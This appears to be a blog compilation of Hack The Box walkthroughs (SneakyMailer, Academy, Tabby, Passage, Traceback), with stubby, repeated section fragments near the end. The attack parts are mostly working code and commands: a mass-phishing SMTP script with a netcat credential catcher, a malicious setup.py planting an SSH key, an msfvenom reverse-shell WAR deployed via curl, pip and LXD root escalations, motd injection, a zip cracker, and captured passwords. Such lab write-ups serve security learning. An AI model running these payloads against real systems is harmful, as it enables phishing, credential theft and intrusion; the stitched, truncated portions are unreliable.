|_imap-capabilities: ACL OK UIDPLUS ACL2=UNION IDLE IMAP4rev1 CHILDREN QUOTA THREAD=ORDEREDSUBJECT AUTH=PLAIN completed CAPABILITY ENABLE NAMESPACE UTF8=ACCEPTA0001 THREAD=REFERENCES SORT
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/18%OT=21%CT=1%CU=44566%PV=Y%DS=2%DC=I%G=Y%TM=5F3BB00
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
OS:1NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.24 seconds

when i visited http://10.10.10.179 it redirected me to http://sneakycorp.htb i added sneakymailer.htb to my etc/hosts then i discovered the platform. i found that this platform contains all Company employees mails in team.php page so i extract all this mails from Html page online extract and looking to the nmap result we found that port 25 is open so that smtp ,so the idea that i have to send phishing mail to all of this mails for this i create python script to send phishing mail

import smtplib 
 

addresslist = ['airisatou@sneakymailer.htb','angelicaramos@sneakymailer.htb','ashtoncox@sneakymailer.htb','bradleygreer@sneakymailer.htb','brendenwagner@sneakymailer.htb',
'briellewilliamson@sneakymailer.htb','brunonash@sneakymailer.htb','caesarvance@sneakymailer.htb','carastevens@sneakymailer.htb', 
'cedrickelly@sneakymailer.htb','chardemarshall@sneakymailer.htb','colleenhurst@sneakymailer.htb','dairios@sneakymailer.htb','donnasnider@sneakymailer.htb',
'doriswilder@sneakymailer.htb','finncamacho@sneakymailer.htb','fionagreen@sneakymailer.htb','garrettwinters@sneakymailer.htb','gavincortez@sneakymailer.htb', 
'gavinjoyce@sneakymailer.htb', 'glorialittle@sneakymailer.htb', 'haleykennedy@sneakymailer.htb','hermionebutler@sneakymailer.htb','herrodchandler@sneakymailer.htb', 
'hopefuentes@sneakymailer.htb', 'howardhatfield@sneakymailer.htb', 'jacksonbradshaw@sneakymailer.htb','jenagaines@sneakymailer.htb','jenettecaldwell@sneakymailer.htb',
'jenniferacosta@sneakymailer.htb', 'jenniferchang@sneakymailer.htb', 'jonasalexander@sneakymailer.htb','laelgreer@sneakymailer.htb','martenamccray@sneakymailer.htb',
'michaelsilva@sneakymailer.htb', 'michellehouse@sneakymailer.htb', 'olivialiang@sneakymailer.htb','paulbyrd@sneakymailer.htb','prescottbartlett@sneakymailer.htb', 
'quinnflynn@sneakymailer.htb', 'rhonadavidson@sneakymailer.htb', 'sakurayamamoto@sneakymailer.htb', 'sergebaldwin@sneakymailer.htb','shaddecker@sneakymailer.htb', 
'shouitou@sneakymailer.htb', 'sonyafrost@sneakymailer.htb', 'sukiburks@sneakymailer.htb','sulcud@sneakymailer.htb', 'tatyanafitzpatrick@sneakymailer.htb', 
'thorwalton@sneakymailer.htb', 'tigernixon@sneakymailer.htb', 'timothymooney@sneakymailer.htb', 'unitybutler@sneakymailer.htb', 'vivianharrell@sneakymailer.htb',
'yuriberry@sneakymailer.htb','zenaidafrank@sneakymailer.htb'] 
 
fromaddr = 'it@sneakymailer.htb' 
 
for address in addresslist: 
    toaddrs  = address 
    TEXT = 'we have a security issue please visit http://10.10.16.120' 
    SUBJECT = 'Security issue' 
    msg = 'Subject: %s\n\n%s' % (SUBJECT, TEXT) 
 
    server = smtplib.SMTP('10.10.10.197',25) 
    server.starttls() 
    server.sendmail(fromaddr, toaddrs, msg) 
    server.quit() 

open port 80 to listen nc -lnvp 80
waiting and finally recive data from mails contains his mail, username and password

email=paulbyrd%40sneakymailer.htb&
password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

i decode this string online

username: PaulByrd

password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

email: paulbyrd@sneakymailer.htb

i tried to login to ftp server by this credential but i failed to login ,i stopped i don’t know what to do so one of my friend give me a hent. Hent was to know what microsoft lookup.

So I searched to find a similar package for Linux in this link you will know all package linux mailer . i installed evolution. i login successfully

I found mail from PaulByrd asked admin to change his name and password Hello administrator, I want to change this password for the developer account so now i have credintial to login ftp server. so i downloaded all ftp server files on my pc to explore it comfortably by this command wget -r -l 10 --ftp-user='developer' --ftp-password='m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C' ftp://10.10.10.197/

I found the path to the dev file i tried to to upload reverse shell to ftp server by curl command but it didn’t work so i used filezilla to upload revese shell freerly.

I uploaded python reverse shell but it doent work so i grep php reverse shell from
pentestmonkey and uploaded it to server and get access to server.

The first steps I always take are converting shell to full tty shell

    /usr/bin/script -qc /bin/bash /dev/null
    Ctrl-Z
    stty raw -echo
    fg

2-user access

after connecting to server I tried to get usr.txt but can’t so I took developer privilege his password ` m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C![Screenshot from 2020-08-19 14-06-50](https://user-images.githubusercontent.com/36403473/95358441-5b692c00-08c9-11eb-9adc-d10aec84d9ed.png) in/var/www/ directory I found another subdomain pypi.sneakycorp.htb, so i added it to /etc/hostson my machine inpypi.sneakycorp.htb directory I found .hpasswd. Firstly, I decrypted the hashed password it was MD5(APR) password after decryptionsoufianeelhaoui`

I now have the privileges to upload my pypi server content So I had to look for a suitable Pypi Server.

The idea is to have a pypi server so that we can upload or modify files, etc. So I looked for ways to upload to the pypi server and use it to take the powers of the user.

After searching, I found out how to install pypi server. pypi setup

The idea that I had in mind is to add the private ssh private to an empty autherized file, and from there, I can income via ssh and get low privileges.

I created a package directory in tmp directory :

        __init__.py
    setup.py
    setup.cfg
    README.md

setup.py

from setuptools import setup ,find_packages
try:
 print ('hello')
 with open('/home/low/.ssh/authorized_keys','w+') as f:
  f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOa1fuNi1hqodCXMlrRpn0K4SLCwYnAaRs/Tm3HXW0GFNey/91O0xi0w/gmUB+g/+6ueXosZuiXaK0GeHw4rtb6ROuD7+cXhIDO2l0FYZOuvddgtYlsq5Tt2cchryRPJnBAVEbONPTvOBjnt1ucT6XnkjBFpVwOq5tB+ogwoJp66pNOVdGjtvB3gRFGW+dgew9VdK2FEX9+7zJGbieulRF+tV7pcCMer95ExX06A/3C9QA+E4vqsNWwlo46yR4O1ZVbsmDUPOs1p9oZpwjZjLJj4okUEhhbxxafWxdaHKfwaXrw350V5y2wqBy05PlCEdstxljQ9zc/FN3QnPojiCLFpueQ3YvaoCub64jJ5vt3umr9GGwC/Ws4OBO95VtgjpeC2wR1RKEy6Ej2UCFpTqdwgUDpLzfDPl92v4A+U0btowuI0FYzFJ3FcfYabLRpFXb2R73OSwIU1F7UHwML8lSsWLAaCUcgYhuRY7o73+pngmhdCJ93tFfat4hQBMWjuE=')
except :
  setup(
  name="room", 
  version="0.0.1",
  author="deveoper",
  author_email="deveoper@test.com",
  description="A small example package",
  long_description_content_type="text/markdown",
  url="http:/test.com",
  packages=find_packages(),
  classifiers=["Programming Language :: Python :: 3","License :: OSI Approved :: MIT License","Operating System :: OS Independent",],
  python_requires='>=3.6', 
)
 

by checking machine ports, I found port 5000 opend in localhost so lets exploit it. create .pypirc file:

[distutils]
index-servers =
  pypi
  room

[pypi]
username: kkkk 
password: kkkk

[room]
repository: http://127.0.0.1:5000
username: pypi 
password: soufianeelhaoui

export HOME=/tmp/python to run setup.py we should export python enviroment. now lets run the exploit and login via ssh

3-root access

by checking user’s privileges ,low can run command from /usr/bin/pip3 so we can get pip shell or revese shell to get root access. first i tried to make pip shell and it was success. got it from here FakePip.

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF

by tf Command we can add news folder and file from file system to TFS Source Control. Need to do check-in before these file can be visible. i created temporary file and run the exploit finally pwned

Academy

2021-03-01T00:00:00+00:00

Hack The Box - Academy

This is my writeup and walkthrough for Academy machine from Hack The Box.

`Enumeration`

1-Nmap

nmap -sC -sV  10.10.10.215
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 19:55 EET
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

checking http service

adding 10.10.10.194 to our /etc/hosts file first i tried to exploit login page may i find sql injection but i failed ,second i used dirsearch tool to brute force directories.

I opened the admin.php page and found it was a login page So I created an account and tried to login from admin.php but failed. this is the request format during registration

i tried to change the value of the roleid to 1 and login again this time i can login successfully i added this subdomain to /etc/hosts and opened it

I noticed that site based on laravel framework and i have app_key so i searched exploits and i found that PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command this module available in metasploit

okey lets exploit we need to set

1-app_key "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
2-lhost
3-rhost 
4-vhost (virtual host) for subdomain  
5-local machine port 

2- user access

In fact, it was not difficult to obtain the powers of the user. I just reviewed the env file and found file with data base and the cry0l1t3 password. Just need some time to search.

3-root access

now i can login with ssh i upgraded to tty shell python3 -c 'import pty; pty.spawn("/bin/bash")' or to upgrade to full tty shell use this commands

   /usr/bin/script -qc /bin/bash /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    Ctrl-Z

i found that adm group, To be honest, I did not know at first what it was, but I searched for it and knew the difference between it and the admin group

by adm previlige i could check process happen in the server is checked all logs i had access on them,

so i checked audit logs its very big logs so i should find way to search logs easly cat audit.log.3 |grep "uid=1002"

this process for server user tried to use su command this data after hexadecimal decode mrb3n_Ac@d3my! I think it’s clear it’s to mrb3n i could take mrb3n previlige by lookng at user privileges sudo -l this user can run coomand from composer

composer

Composer is a tool for dependency management in PHP.
It allows you to declare the libraries your project depends on and it will manage (install/update) them for you.

Composer documentation

Tabby

2020-11-08T00:00:00+00:00

Hack The Box - Tabby

This is my writeup and walkthrough for tabby from Hack The Box.

an easy linux machine with some vulnerable LFI

`Enumeration`

1-Nmap

nmap -sC -sV 10.10.10.194

theblock@python-4004:~$ nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 01:22 EET
Nmap scan report for megahosting.htb (10.10.10.194)
Host is up (0.47s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

My focus was on Port 80 `http Apache httpd 2.4.41 ((Ubuntu))` ,and 8080 running a http Apache called `Tomcat`.

2-website

Ckeck site very well moving to `news` page founding paramter `file` it maybe vulnerable

First i thought it may be `LFI` and it was right expectation but let’s add 10.10.10.194 to our `/etc/hosts` file

the second step is to exploit but i need more information now the role of port `8080`

checking this port `10.10.10.194:8080`

The CATALINA_HOME and CATALINA_BASE environment variables are used to specify the location of Apache Tomcat and the location of its active configuration, respectively.

this information is very important Users are defined in /etc/tomcat9/tomcat-users.xml. okey lets see our users using CATALINA_HOME i think its very important to see Apache Tomcat 8 docs ,googling and lets try to get usrs from tomcat-users.xml Tomcat docs

very good i have tomcat password $3cureP4s5w0rd123! now i can acess The host-manager but i dont have any authorization to upload any shell on this server so lets googling maybe find way. i found an exploitaion to this server Tomcat exploitaion now from LFI we can get RCE

Exploitation

Exploitation is to Generate .war Format Backdoor,We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create a .war format file and then run Netcat listener.

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.120 LPORT=1234 -f war > kk.war
 nc -lvp 1234

Deploy A New Application from a Local Path from this path http://10.10.10.194:8080/manager/text/deploy?path=filename this mentioned in the documentation

using curl command to send .war file to server

curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file kk.war "http://10.10.10.194:8080/manager/text/deploy?path=/kk.war"

checking context http://10.10.10.194:8080/manager/text/deploy?config=file:/path/context.xml

`kk.war` is uploaded successfully

connected to machine and upgrade to tty shell python3 -c 'import pty; pty.spawn("/bin/bash")' or to upgrade to full tty shell use this commands

    /usr/bin/script -qc /bin/bash /dev/null
     Ctrl-Z
     stty raw -echo
     fg
     Ctrl-Z
    

Privilege Escalation

1- Own User

in this step lets discover system and search for any things that seem important to escalate your privilege in /home/ash i couldnt go inside lets look deeper in /var/www/html/files i found 16162020_backup.zip that need password to be unziped so i copy this zip file from target machine to my machine by nc command

target machine 
nc 10.10.16.120 4000 > 16162020_backup.zip
my machine 
nc -l -p 4000 < 16162020_backup.zip

i develop simple python code to crack this zip file password

#!/usr/local/bin/python3
from tqdm  import tqdm 
import zipfile
import sys

wordlist = sys.argv[2]
zip_file = sys.argv[1]

zip_file = zipfile.ZipFile(zip_file)
n_words = len(list(open(wordlist, "rb")))

print("Total passwords to test:", n_words)
with open(wordlist, "rb") as wordlist:
    for word in tqdm(wordlist, total=n_words, unit="word"):
        try:
            zip_file.extractall(pwd=word.strip())
        except:
            continue
        else:
            print("[+] Password found:", word.decode().strip())
            exit(0)
print("[!] Password not found, try other wordlist.")

the password admin@it And now we owned user ash: getting usr.txt

2- Own Root

This step took me a lot of time, although it was not difficult but finally i own machine lets explian the exploit on seeig autherization by id

A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package. Lxd Privilege Escalation

Steps to be performed on the attacker machine:

1-Download build-alpine in your local machine through the git repository.

2-Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.

3-Transfer the tar file to the host machine

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

i upload all files on my localhost

on the target machine wget http://10.10.16.120/lxd-alpine-builder-master/alpine-v3.12-x86_64-20200630_1546.tar.gz on /tmp or /home

After the image is built it can be added as an image to LXD as follows: lxc image import alpine-v3.12-x86_64-20200630_1546.tar.gz --alias myimage lxc image list

 lxc init myimage ignite -c security.privileged=true
 lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
 lxc start ignite
 lxc exec ignite /bin/sh
 id

Once inside the container, navigate to /mnt/root to see all resources from the host machine. After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it.

mnt/root/root
ls
flag.txt
cat flag.txt

finally pwned

Passage

2020-10-02T00:00:00+00:00

Hack The Box - Passage

This is my writeup and walkthrough for Pssage from Hack The Box.

Description

A vulnerable management system by remote code excute Through it I was able to enter the server and I found a file with words that I decrypted with a base64 , then I found that it had a hash sha2-256 type, then I decrypted it and found a password for User Paul that took his credintials on the server and was able to access his file and found its flag

`Enumeration`

1-Nmap

nmap -sV -sV  10.10.10.206
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 01:22 EET
Nmap scan report for Passage.htb (10.10.10.206)
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.56 seconds

2-User

we have port 22 and 80 so i visited http://passage.htb:80 .\

Note I added passage domain to machine ip to /etc/hosts first .\

I didn’t find useful thing , i tried to brute force directory but server down several times so i decided to find another way talk look again i discovered that this site powered by CuteNews

After using google i discovered that CuteNews is management system So I searched if CuteNews vulnerable or not
Finally i found that CuteNews vulnerable by Remote Code Execution.\

I downloaded from exploit-db website exploit and installed the exploit on metasploit. CuteNews 2.1.2 - ‘avatar’ Remote Code Execution . This exploit need account credential do after alter searching i found login screen i created an account

After running exploit from metasploit After enumerat the server i found file call lines in /var/www/html/CuteNews/cdata/users directory have important informations

<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg4MzQwNzkiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3Nwd3ZndWp3LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=

I decoded this lines to base64 and i found hash this . I got to know the type of encryption used SHA2-256 and then I decrypt it online and it was the password

now i have paul credential In paul file there is a file for ssh ,And I had ssh private and public key ,so i copied ssh private key and used port 22 to login by paul private key

I have successfully logged in and gained user flag

3-Root

At this stage it took a lot of time, but I remembered that I have another user and therefore it may be useful, but I cannot see the content of the file I decided to turn off the laptop And watch a movie.
I started over The first, after some thought, I decided to see the processes that happened on the machines using ` ps -auwx` command.

I found Paul used the same ssh private to log into the nadav account

I tried to see the processes created by nadav ps -auwx And I noticed dbus-daemon - Message bus daemon
D-Bus as its inter-process communications (IPC) mediator

In these moments a time and a stage began to learn more about the dbas system. After the search, I found an exploitation of a security vulnerability , and therefore I decided to review the conference file to find out if he was injured from the site or system side\

you can read more about dbus-daemon from herer dbus-daemon . After researching, I found that there was indeed a security issue in USBCreator D-Bus Privilege Escalation in Ubuntu Desktop. USBCreator D-Bus Privilege Escalation

The explanation of the exploitation is that I can copy the content of a file or modify it to a file without obtaining permission from the owner of that file
The idea is that I created a test.txt file in tmp directory and copied the contents of the root/root.txt to tmp/test.txt by gdbus commnad that i found in the USBCreator D-Bus exploit.

Traceback

2020-08-14T00:00:00+00:00

Hack The Box - Tracback

This is my writeup and walkthrough for Traceback from Hack The Box.

It was an easy machine from Hack The Box

`Enumeration`

1-Nmap

nmap -sC -sV 10.10.10.181

nmap -sC -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 01:20 EET
Nmap scan report for 10.10.10.181
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 103K  2020-02-27 05:37  smevk.php
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I found http on port 80 and ssh on port 22. use should have password to conncet server so lets see http i opend source code i found this comment ` `

the first thing i do i bruteforce http dircetory by Wfuzz but it take much time , i googled on this comment i found differnt web shells on : https://github.com/TheBinitGhimire/Web-Shells” reading smevk.php we can login http://10.10.10.181/smevk.php username:admin password:admin

now lets go to this directory /home/webadmin/.ssh i could to upload ssh autherizeed key to generate ssh keys
i used ssh-keygen tool on linux

2-user access

so now lets try to login to server: ssh-i id_rsa webadmin@10.10.10.181

two files was the solution to take user acess note.txt & bash-history okey the olny thing we will do write simple lua script and save it on file echo ‘os.execute(“ /bin/bash -i “)’ »block.lua ** save it on **block.lua file

okey lets try to acess sysadmin by block.lua ` sudo -u sysadmin /home/sysadmin/luvit block.lua ` go back to home directory

now i have access on sysadmin checking files ls -al

now i have user access user.txt

3-root access

lets try to get root access, so i searched all files i didnt get any thing. after googling much time to get root access i use ps -aux commmnd to provide information about the currently running processes. i notice that there was an operation happened in this directory /etc/update-motd.d/ going to this directory ckeck all details ls -al after googling i discovred bug in The file /etc/update-motd.d/00-header according to this /etc/update-motd.d/00-header is broken.

so lets echo "cat root/root.txt " >> 00-header then login again to server i try many time to login at the end the root flag printed on the welcome screen

python4004

Timing

Hack The Box - Timing

Brief of attacks :

1-Nmap

user flag

note :

LFI:

notice

code review:

login.php:

analyzing(upload.php):

note that

Root flag

Symbolic link:

Secret

Hack The Box - Secret

This is my Writeup and walkthrough for Secret machine from Hack The Box.

description :

1-Nmap

User access

let’s explain our code

1- route to /priv we found that code only check on the name parameter that name ==theadmin.

2- route /log/ exec(getLogs, (err , output) here we got RCE that took ${file} and executed.

STEPS To be authenticated:

STEPS to be authorized :

ROOT ACCESS

let’s check this code

Core Dump

what we can do and how exploit occur ????

Bountyhunter

Hack The Box - BountyHunter

This is my Writeup and walkthrough for BountyHunter machine from Hack The Box.

Enumeration

1-Nmap

User access

2- HTTP service

thats very good lets encode our xml code and try to inject again

(Note that An x character indicates that encrypted password is stored in /etc/shadow file like root:x:)

3- SSH

ROOT access

Sneakymailer

Hack The Box - Sneakymailer

This is my writeup and walkthrough for sneakymailer from Hack The Box.

a medium linux machine.

Enumeration

1-Nmap

2-user access

3-root access

Academy

Hack The Box - Academy

This is my writeup and walkthrough for Academy machine from Hack The Box.

Enumeration

1-Nmap

checking http service

2- user access

3-root access

composer

Tabby

Hack The Box - Tabby

This is my writeup and walkthrough for tabby from Hack The Box.

an easy linux machine with some vulnerable LFI

Enumeration

1-Nmap

My focus was on Port 80 http Apache httpd 2.4.41 ((Ubuntu)) ,and 8080 running a http Apache called Tomcat.

2-website

Ckeck site very well moving to news page founding paramter file it maybe vulnerable

